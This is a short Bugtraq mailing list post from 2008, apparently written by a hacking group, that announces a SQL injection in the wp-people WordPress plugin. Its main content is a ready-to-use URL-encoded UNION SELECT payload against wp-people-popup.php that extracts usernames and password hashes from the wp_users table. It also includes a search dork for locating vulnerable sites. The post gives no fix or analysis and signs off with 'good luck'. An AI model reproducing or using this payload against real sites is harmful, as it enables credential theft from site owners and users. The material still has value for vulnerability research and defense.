|
Bugtraq
mailing list archives
Wordpress Plugin (wp-people) SQL Injection
From: hackturkiye.hackturkiye () gmail com
Date: 16 Feb 2008 16:52:09 -0000
#########################################################################
#
# Wordpress Plugin (wp-people) SQL Injection
#
#########################################################################
#
# AUTHOR : S () BUN
#
# HOME : http://www.hackturkiye.com/
#
#########################################################################
#
# DORKS 1 : allinurl :"allinurl: "wp-people""
#
##########################################################################
EXPLOIT :
wp-content/plugins/wp-people/wp-people-popup.php?person=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cuser_pass%2Cuser_login%2C3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users
##########################################################################
# S () BUN GOOD LUCKY S () BUN
##########################################################################
 By Date 
By Thread
Current thread:
- Wordpress Plugin (wp-people) SQL Injection hackturkiye . hackturkiye (Feb 18)
| 
Intro
